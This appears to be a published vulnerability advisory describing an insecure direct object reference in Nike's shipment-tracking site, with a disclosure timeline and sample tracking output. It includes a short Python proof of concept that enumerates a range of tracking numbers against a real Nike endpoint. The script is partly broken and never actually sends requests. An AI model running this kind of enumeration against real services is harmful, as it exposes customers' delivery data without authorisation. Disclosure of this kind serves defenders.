Nike.com - Insecure Direct Object Reference (IDOR)

2020.05.27
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

Exploit Title: Nike.com - Insecure Direct Object Reference (IDOR). Exploit Author: Nir Yehoshua. Exploit Date: 2020-5-27. Link to vulnerable website: https://www.nike.com Category: Web Application. Details: An IDOR vulnerability discovered at Nike.com website that can lead to sensitive information disclosure. Proof of Concept (Python): ============================= #Nike.com IDOR by Nir Yehoshua import requests URL = 'https://secure-global-tracking.nike.com/nike/tracking/%d' def IDOR(): for number in range(6001050010000, 6001056053999): Request(number) def Request(nunber): BaseRequest = URL % nunber print BaseRequest IDOR() Example Data: Date Time Description Location 2020-02-27 13:45 Delivered MORELIA-MEX 2020-02-27 13:13 Out for Delivery MORELIA-MEX 2020-02-26 11:06 Arrived at Transit Hub GUADALAJARA-MEX 2020-02-26 02:00 Customs Released CINCINNATI HUB,OH-USA 2020-02-25 21:35 In Transit to Destination Country BRUSSELS-BEL 2020-02-25 15:31 Departed Origin Country AMSTERDAM-NLD 2020-02-24 18:22 Pending customs release (Please allow 1-2 days) 2020-02-24 11:01 Arrived Destination Region/Country AMS 2020-02-24 10:58 General Update 2020-02-23 16:14 Departed International Hub 2020-02-23 15:59 Arrived International Hub 2020-02-23 11:01 Departed Origin Country AMS 2020-02-23 08:12 Packages Details Received – Awaiting Dispatch NL * Date/Time values are local times where the activity is located Disclosure Timeline: February 26th – Vulnerability reported to Nike. February 28th – Initial response and vulnerability confirmation from Nike. March 4th – Status update from Nike. April 7th – An update email sent to Nike about the intention to disclose the vulnerability. No response from Nike. May 27th – The vulnerability disclosed after 90 days of deadline that has given to Nike to patch the vulnerability.


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top